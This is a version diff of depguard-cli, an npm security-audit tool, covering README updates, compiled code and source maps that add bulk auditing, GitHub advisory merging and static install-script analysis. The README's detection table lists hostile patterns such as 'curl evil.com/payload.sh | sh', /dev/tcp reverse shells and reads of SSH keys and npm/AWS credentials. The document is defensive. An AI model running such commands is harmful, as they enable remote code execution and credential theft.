depguard-cli 1.1.2 → 1.2.1

package/README.md

@@ -176,10 +176,63 @@ claude mcp add --transport stdio depguard -- npx -y depguard-cli --mcp
 | Tool | Description |
 |------|-------------|
 | `depguard_audit` | Full security audit of an npm package |
+| `depguard_audit_bulk` | Audit multiple packages in a single call |
 | `depguard_search` | Search npm for packages by keywords |
 | `depguard_score` | Score a package 0-100 |
 | `depguard_should_use` | Recommend install vs write-from-scratch |
 
+### Bulk audit
+
+Audit all project dependencies in a single call. Accepts a list of package names or a dependencies object directly from `package.json`:
+
+```typescript
+// Via API
+import { auditBulk } from 'depguard-cli'
+
+const report = await auditBulk(['react', 'express', 'lodash'], { targetLicense: 'MIT' })
+console.log(report.total)       // 3
+console.log(report.vulnerable)  // 2
+console.log(report.summary)     // { critical: 0, high: 2, moderate: 5, low: 3 }
+```
+
+Via MCP, the AI agent can pass the dependencies object from `package.json` directly — no need to extract package names manually.
+
+## Install Script Analysis
+
+depguard statically analyzes install scripts (`preinstall`, `install`, `postinstall`) for suspicious patterns commonly used in supply chain attacks:
+
+| Pattern | Severity | Example |
+|---------|----------|---------|
+| Remote code execution | Critical | `curl evil.com/payload.sh \| sh` |
+| Reverse shells | Critical | `/dev/tcp/` connections |
+| Credential file access | Critical | Reading `~/.ssh/id_rsa`, `~/.npmrc`, `~/.aws` |
+| Sensitive env vars | Critical | Accessing `$NPM_TOKEN`, `$AWS_SECRET` |
+| Shell typosquatting | Critical | `/bin/ssh` instead of `/bin/sh` |
+| Obfuscated code | High | `eval(Buffer.from(..., "base64"))` |
+| Process spawning | High | `child_process`, `exec()`, `spawn()` |
+| Environment access | High | `process.env` usage |
+| External network calls | Moderate | HTTP requests to non-standard hosts |
+
+Each audit report includes a `scriptAnalysis` field with `suspicious` (boolean) and `risks` (array of detected patterns with severity and description). No scripts are executed — analysis is purely static pattern matching.
+
+## Data sources
+
+depguard combines two advisory databases for maximum coverage:
+
+| Source | What it catches |
+|--------|----------------|
+| **npm Registry** | Advisories from `npm audit` |
+| **GitHub Advisory Database** | GHSA advisories, often not in npm |
+
+Results are deduplicated, filtered by the current package version (only vulnerabilities that actually affect the installed version are reported), and each advisory includes a `source` field (`npm` or `github`).
+
+### Caching
+
+Results are cached in memory (5 min) and on disk at `~/.depguard/cache/` (24h). This means:
+- Repeated audits of the same package are instant (no network requests)
+- Cache survives process restarts
+- Expired entries are cleaned up automatically on startup
+
 ## License compatibility
 
 depguard checks license compatibility using a permissive-to-copyleft hierarchy:
@@ -204,7 +257,7 @@ A dependency is compatible if its license is equally or more permissive than you
 ```bash
 npm run build    # compile TypeScript
 npm run lint     # ESLint (strict)
-npm test         # 54 tests (all offline)
+npm test         # 84 tests (all offline)
 npm run check    # build + lint + test + audit
 ```
 

package/dist/audit.d.ts

@@ -1,6 +1,7 @@
 import type { AuditReport, FetchFn } from './types.js';
 /**
  * Produce a full audit report for an npm package.
+ * Combines advisories from both npm registry and GitHub Advisory Database.
  * Never throws on network errors — returns a degraded report with warnings.
  */
 export declare function audit(name: string, targetLicense?: string, fetcher?: FetchFn): Promise<AuditReport>;

package/dist/audit.d.ts.map

@@ -1 +1 @@
-{"version":3,"file":"audit.d.ts","sourceRoot":"","sources":["../src/audit.ts"],"names":[],"mappings":"AAAA,OAAO,KAAK,EAAE,WAAW,EAAE,OAAO,EAAwB,MAAM,YAAY,CAAA;AAM5E;;;GAGG;AACH,wBAAsB,KAAK,CACzB,IAAI,EAAE,MAAM,EACZ,aAAa,SAAQ,EACrB,OAAO,GAAE,OAA0B,GAClC,OAAO,CAAC,WAAW,CAAC,CAsFtB"}
+{"version":3,"file":"audit.d.ts","sourceRoot":"","sources":["../src/audit.ts"],"names":[],"mappings":"AAAA,OAAO,KAAK,EAAE,WAAW,EAAE,OAAO,EAAqC,MAAM,YAAY,CAAA;AAuEzF;;;;GAIG;AACH,wBAAsB,KAAK,CACzB,IAAI,EAAE,MAAM,EACZ,aAAa,SAAQ,EACrB,OAAO,GAAE,OAA0B,GAClC,OAAO,CAAC,WAAW,CAAC,CA0GtB"}

package/dist/audit.js

@@ -1,8 +1,64 @@
-import { fetchPackage, fetchDownloads, fetchAdvisories } from './registry.js';
+import { fetchPackage, fetchDownloads, fetchAdvisories, fetchGitHubAdvisories } from './registry.js';
 import { checkLicenseCompatibility } from './license.js';
+import { analyzeScripts } from './script-analysis.js';
+import { satisfiesRange } from './semver.js';
 const INSTALL_SCRIPT_NAMES = ['preinstall', 'install', 'postinstall'];
+/** Map GitHub severity to npm severity */
+function mapGitHubSeverity(severity) {
+    switch (severity) {
+        case 'critical': return 'critical';
+        case 'high': return 'high';
+        case 'medium': return 'moderate';
+        case 'low': return 'low';
+        default: return 'low';
+    }
+}
+/**
+ * Merge npm and GitHub advisories, deduplicating by URL.
+ * GitHub advisories are converted to NpmAdvisory format.
+ */
+function mergeAdvisories(npmAdvisories, ghAdvisories, currentVersion) {
+    const seen = new Set();
+    const merged = [];
+    // Add npm advisories first (npm bulk endpoint already filters by version)
+    for (const adv of npmAdvisories) {
+        seen.add(adv.url);
+        merged.push({ ...adv, source: 'npm' });
+    }
+    // Guard against non-array responses
+    if (!Array.isArray(ghAdvisories))
+        return merged;
+    // Add GitHub advisories that aren't already covered
+    for (const gh of ghAdvisories) {
+        if (seen.has(gh.html_url))
+            continue;
+        // Also check if we already have the same GHSA by matching URL patterns
+        const ghsaInNpm = npmAdvisories.some(a => a.url.includes(gh.ghsa_id));
+        if (ghsaInNpm)
+            continue;
+        // Filter: only include if current version is actually affected
+        const vuln = gh.vulnerabilities?.[0];
+        const range = vuln?.vulnerable_version_range;
+        if (range && !satisfiesRange(currentVersion, range)) {
+            continue; // Current version is NOT in the vulnerable range — skip
+        }
+        merged.push({
+            id: parseInt(gh.ghsa_id.replace(/\D/g, '').slice(0, 8)) || 0,
+            title: gh.summary,
+            severity: mapGitHubSeverity(gh.severity),
+            url: gh.html_url,
+            vulnerable_versions: range ?? '*',
+            patched_versions: vuln?.first_patched_version ?? null,
+            cwe: gh.cwes?.map(c => c.cwe_id),
+            cvss: gh.cvss ? { score: gh.cvss.score, vectorString: gh.cvss.vector_string } : undefined,
+            source: 'github',
+        });
+    }
+    return merged;
+}
 /**
  * Produce a full audit report for an npm package.
+ * Combines advisories from both npm registry and GitHub Advisory Database.
  * Never throws on network errors — returns a degraded report with warnings.
  */
 export async function audit(name, targetLicense = 'MIT', fetcher = globalThis.fetch) {
@@ -21,34 +77,51 @@ export async function audit(name, targetLicense = 'MIT', fetcher = globalThis.fe
             hasInstallScripts: false,
             deprecated: false,
             vulnerabilities: emptyVulnerabilities(),
+            scriptAnalysis: { suspicious: false, risks: [] },
             licenseCompatibility: checkLicenseCompatibility(null, targetLicense),
             warnings: ['Could not fetch package data from npm registry'],
         };
     }
     const latestVersion = pkg['dist-tags']?.latest ?? Object.keys(pkg.versions).pop() ?? 'unknown';
     const versionData = pkg.versions[latestVersion];
-    // Fetch downloads and advisories concurrently
-    const [downloads, advisories] = await Promise.all([
+    // Fetch downloads, npm advisories, and GitHub advisories concurrently
+    const [downloads, npmAdvisories, ghAdvisories] = await Promise.all([
         fetchDownloads(name, fetcher).catch(() => {
             warnings.push('Could not fetch download counts');
             return 0;
         }),
         fetchAdvisories(name, latestVersion, fetcher).catch(() => {
-            warnings.push('Could not fetch security advisories');
+            warnings.push('Could not fetch npm security advisories');
+            return [];
+        }),
+        fetchGitHubAdvisories(name, fetcher).catch(() => {
+            warnings.push('Could not fetch GitHub security advisories');
             return [];
         }),
     ]);
+    const advisories = mergeAdvisories(npmAdvisories, ghAdvisories, latestVersion);
     const license = versionData?.license ?? pkg.license ?? null;
     const deps = versionData?.dependencies ?? {};
     const scripts = versionData?.scripts ?? {};
     const hasInstallScripts = INSTALL_SCRIPT_NAMES.some(s => s in scripts);
     const deprecated = !!versionData?.deprecated;
+    const scriptResult = analyzeScripts(scripts);
     if (deprecated) {
         warnings.push(`Package is deprecated: ${versionData?.deprecated}`);
     }
     if (hasInstallScripts) {
         warnings.push('Package has install scripts — review carefully');
     }
+    if (scriptResult.suspicious) {
+        const criticalCount = scriptResult.risks.filter(r => r.severity === 'critical').length;
+        const highCount = scriptResult.risks.filter(r => r.severity === 'high').length;
+        if (criticalCount > 0) {
+            warnings.push(`CRITICAL: ${criticalCount} suspicious pattern(s) found in install scripts`);
+        }
+        if (highCount > 0) {
+            warnings.push(`WARNING: ${highCount} potentially dangerous pattern(s) found in install scripts`);
+        }
+    }
     const vulnerabilities = {
         total: advisories.length,
         critical: advisories.filter(a => a.severity === 'critical').length,
@@ -76,6 +149,7 @@ export async function audit(name, targetLicense = 'MIT', fetcher = globalThis.fe
         hasInstallScripts,
         deprecated,
         vulnerabilities,
+        scriptAnalysis: scriptResult,
         licenseCompatibility: licenseCompat,
         warnings,
     };

package/dist/audit.js.map

@@ -1 +1 @@
-{"version":3,"file":"audit.js","sourceRoot":"","sources":["../src/audit.ts"],"names":[],"mappings":"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"}
+{"version":3,"file":"audit.js","sourceRoot":"","sources":["../src/audit.ts"],"names":[],"mappings":"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"}

package/dist/bulk.d.ts

@@ -0,0 +1,27 @@
+import type { AuditReport, FetchFn } from './types.js';
+/** Options for bulk audit */
+export interface BulkAuditOptions {
+    targetLicense?: string;
+    concurrency?: number;
+    fetcher?: FetchFn;
+}
+/** Bulk audit result */
+export interface BulkAuditReport {
+    total: number;
+    clean: number;
+    vulnerable: number;
+    deprecated: number;
+    results: AuditReport[];
+    summary: {
+        critical: number;
+        high: number;
+        moderate: number;
+        low: number;
+    };
+}
+/**
+ * Audit multiple packages concurrently with controlled parallelism.
+ * Defaults to 5 concurrent requests to stay within rate limits.
+ */
+export declare function auditBulk(packages: string[], options?: BulkAuditOptions): Promise<BulkAuditReport>;
+//# sourceMappingURL=bulk.d.ts.map

package/dist/bulk.d.ts.map

@@ -0,0 +1 @@
+{"version":3,"file":"bulk.d.ts","sourceRoot":"","sources":["../src/bulk.ts"],"names":[],"mappings":"AAAA,OAAO,KAAK,EAAE,WAAW,EAAE,OAAO,EAAE,MAAM,YAAY,CAAA;AAGtD,6BAA6B;AAC7B,MAAM,WAAW,gBAAgB;IAC/B,aAAa,CAAC,EAAE,MAAM,CAAA;IACtB,WAAW,CAAC,EAAE,MAAM,CAAA;IACpB,OAAO,CAAC,EAAE,OAAO,CAAA;CAClB;AAED,wBAAwB;AACxB,MAAM,WAAW,eAAe;IAC9B,KAAK,EAAE,MAAM,CAAA;IACb,KAAK,EAAE,MAAM,CAAA;IACb,UAAU,EAAE,MAAM,CAAA;IAClB,UAAU,EAAE,MAAM,CAAA;IAClB,OAAO,EAAE,WAAW,EAAE,CAAA;IACtB,OAAO,EAAE;QACP,QAAQ,EAAE,MAAM,CAAA;QAChB,IAAI,EAAE,MAAM,CAAA;QACZ,QAAQ,EAAE,MAAM,CAAA;QAChB,GAAG,EAAE,MAAM,CAAA;KACZ,CAAA;CACF;AAED;;;GAGG;AACH,wBAAsB,SAAS,CAC7B,QAAQ,EAAE,MAAM,EAAE,EAClB,OAAO,GAAE,gBAAqB,GAC7B,OAAO,CAAC,eAAe,CAAC,CAiD1B"}

package/dist/bulk.js

@@ -0,0 +1,45 @@
+import { audit } from './audit.js';
+/**
+ * Audit multiple packages concurrently with controlled parallelism.
+ * Defaults to 5 concurrent requests to stay within rate limits.
+ */
+export async function auditBulk(packages, options = {}) {
+    const { targetLicense = 'MIT', concurrency = 5, fetcher = globalThis.fetch, } = options;
+    if (packages.length === 0) {
+        return { total: 0, clean: 0, vulnerable: 0, deprecated: 0, results: [], summary: { critical: 0, high: 0, moderate: 0, low: 0 } };
+    }
